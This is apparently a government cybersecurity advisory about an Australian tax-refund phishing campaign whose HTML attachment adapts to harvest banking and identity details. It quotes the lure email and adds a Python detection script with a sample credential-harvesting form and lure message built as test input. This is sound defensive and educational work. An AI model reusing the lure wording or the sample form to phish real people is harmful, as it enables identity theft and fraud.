We all know the saying: ‘Nothing is certain but death and taxes’. But in the online world, there’s a new certainty—tax-related phishing campaigns will ramp up around tax return time. We’re already starting to see this year’s crop in the spam reports we receive from members of the Australian public.
Some of these phishing campaigns are very sophisticated, and one particularly complex campaign is currently doing the rounds. Dubbed the ‘financial institutions smart phish’ campaign, it’s so-called because the ‘phish’ can dynamically adapt its content to request customer credentials for almost every financial institution currently operating in Australia.
How does the phish work?
The phish is delivered through a spam email with an attached HTML file. The email text encourages the recipient to open the file, as in the below example:
After the last calculation of your fiscal activity, we have determined that you are eligible to receive a refund of $699.64
In order to receive your tax refund, please follow next steps:
- Save the attached form on your PC and open it in a web browser (e.g. Chrome, Safari or Firefox). If you can’t save the attached form, please use a different browser.
- Once opened, you will be provided with the steps to complete your tax refund application form.
- Complete the attached form accurately to avoid delays in processing your application.
We will refund your tax within 30 days after you submit the form.
Tax Refund Department
Australian Taxation Office
If you open the attachment, an ‘Australian Taxation Office – Refund Form’ (see below) appears requesting relatively general personal information. Unlike many phishing campaigns, the form is professionally presented, with clear English expression.
As you complete the data in the form, it dynamically changes. For example, a field appears requesting ‘Card Type’ information. Depending on what card information you enter, different fields will appear in the form, such as the name of the financial institution the card belongs to and additional relevant information.
The form will request additional personal information—such as your driver's licence, Medicare or passport number. If you choose the ‘driver's licence’ option, the form fields change to reflect which state or territory issued your licence. A default security question response will also be requested, such as ‘Mother’s Maiden Name’ or ‘Pet’s Name’.
This ‘smart’ form can even identify incorrectly entered information, such as an invalid credit card number or too many/too few alpha or numeric characters. ‘Help’ fields also appear to assist data entry. All of these features help to make the form look legitimate.
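The traits described above (an HTML attachment carrying a form that asks for card, Medicare, passport and security-question details, validates card numbers client-side, and posts to a remote server) are exactly what a mail-gateway or incident-response check can look for. The script below is an added example written for this article; it is not ACMA code and the campaign's actual attachment is not reproduced. It assumes a hypothetical keyword list of sensitive field names and a scoring threshold of 3, and the email it inspects is a constructed sample built inline with the standard library.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Field names a tax-office form would never ask for (assumed keyword list for this example).
SENSITIVE_FIELDS = ("card", "cvv", "cvc", "expiry", "pin", "password", "medicare",
                    "passport", "licence", "license", "maiden", "pet", "tfn", "account")


class FormInspector(HTMLParser):
    """Collect every form action, input/select field name and inline script body."""

    def __init__(self):
        super().__init__()
        self.actions, self.fields, self.scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag in ("input", "select", "textarea"):
            name = (a.get("name") or a.get("id") or a.get("placeholder") or "").lower()
            if name:
                self.fields.append(name)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:          # HTMLParser hands <script> bodies to handle_data verbatim
            self.scripts.append(data)


def html_attachments(raw_message: bytes):
    """Yield (filename, html text) for each HTML file attached to a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html" and part.get_filename():
            yield part.get_filename(), part.get_content()


def inspect_html(html_text: str) -> dict:
    """Score one HTML document on the traits of a credential-harvesting form."""
    p = FormInspector()
    p.feed(html_text)
    sensitive = sorted({f for f in p.fields if any(k in f for k in SENSITIVE_FIELDS)})
    script = "\n".join(p.scripts)
    # A mod-10 (Luhn) loop or a 13-19 digit length test in client-side JavaScript is the
    # "smart" card-number validation the article describes.
    luhn_like = bool(re.search(r"%\s*10\b|\bluhn\b|\{13,19\}", script, re.I))
    # A form opened from a local file that posts to a remote server is the other key trait.
    external = [a for a in p.actions if re.match(r"https?://", a, re.I)]
    score = len(sensitive) + (2 if luhn_like else 0) + (2 if external else 0)
    return {"sensitive_fields": sensitive, "luhn_like_validation": luhn_like,
            "external_actions": external, "score": score}


def scan_message(raw_message: bytes, threshold: int = 3) -> list:
    """Return [(filename, findings)] for every HTML attachment scoring at or above threshold."""
    return [(name, f) for name, html_text in html_attachments(raw_message)
            if (f := inspect_html(html_text))["score"] >= threshold]


# Constructed sample attachment: a minimal form with the same field types and a
# Luhn check in inline JavaScript. It is not the real campaign's file.
SAMPLE_HTML = """<html><body>
<form action="https://example.invalid/refund" method="post">
  Full name <input name="fullname">
  Card type <select name="cardtype"><option>Visa</option></select>
  Card number <input name="cardnumber">  CVV <input name="cvv">
  Medicare number <input name="medicare">
  Mother's maiden name <input name="maidenname">
  <input type="submit" value="Submit">
</form>
<script>
function ok(n){var s=0,alt=false;for(var i=n.length-1;i>=0;i--){var d=+n[i];
if(alt){d*=2;if(d>9)d-=9;}s+=d;alt=!alt;}return s%10==0;}
</script></body></html>"""


def build_sample_email() -> bytes:
    """Construct a lure-style message with the sample HTML attached (test input only)."""
    msg = EmailMessage()
    msg["From"] = "refunds@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Tax refund notification"
    msg.set_content("Save the attached form on your PC and open it in a web browser.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="Refund_Form.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, findings in scan_message(build_sample_email()):
        print(filename, findings)
```

The scoring is deliberately simple so it can run inside a mail filter or over a mailbox export: every sensitive field name adds one point, and the two structural traits (client-side card validation, a form action pointing at a remote host) add two each. Tune `SENSITIVE_FIELDS` and the threshold to your own environment, since legitimate newsletters rarely attach HTML forms at all, and any attachment that asks for both a card number and a security question answer deserves quarantine regardless of score.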
How can I avoid being scammed?
Below is an example of an almost completed form with expanded fields that include sensitive and extensive personal identity information. If you provided this information, the criminals behind the phishing campaign may have sufficient detail to impersonate you and potentially use it to try to access your financial accounts.
This phishing campaign seems to have a strategy of using a sophisticated form to dupe internet users into a false sense of security. For example:
- The form field information includes the details of current Australian financial institutions.
- Many items requested in the form will be familiar to users accustomed to online accounts such as PayPal.
- It appears that, rather than send large numbers of spam emails with the attachment, the spam ‘runs’ are fairly small in number. Presumably, this is to reduce the prospects of the spam being detected by network spam filtering devices.
Our advice on how to avoid these scams is simple—never open forms attached to emails. No reputable organisation will ask you for information in this way.
You should also use two-factor authentication on your accounts where this is available. If your username and password are exposed, you’ll still be protected by the other ‘factor’.
Check out the Stay Smart Online website for further tips on how to avoid having your personal information exposed to a phishing campaign.
Subscribe to the ACMA’s Cybersecurity news for the latest cybersecurity trends and updates from the Australian Internet Security Initiative, with a focus on malware and botnet activities.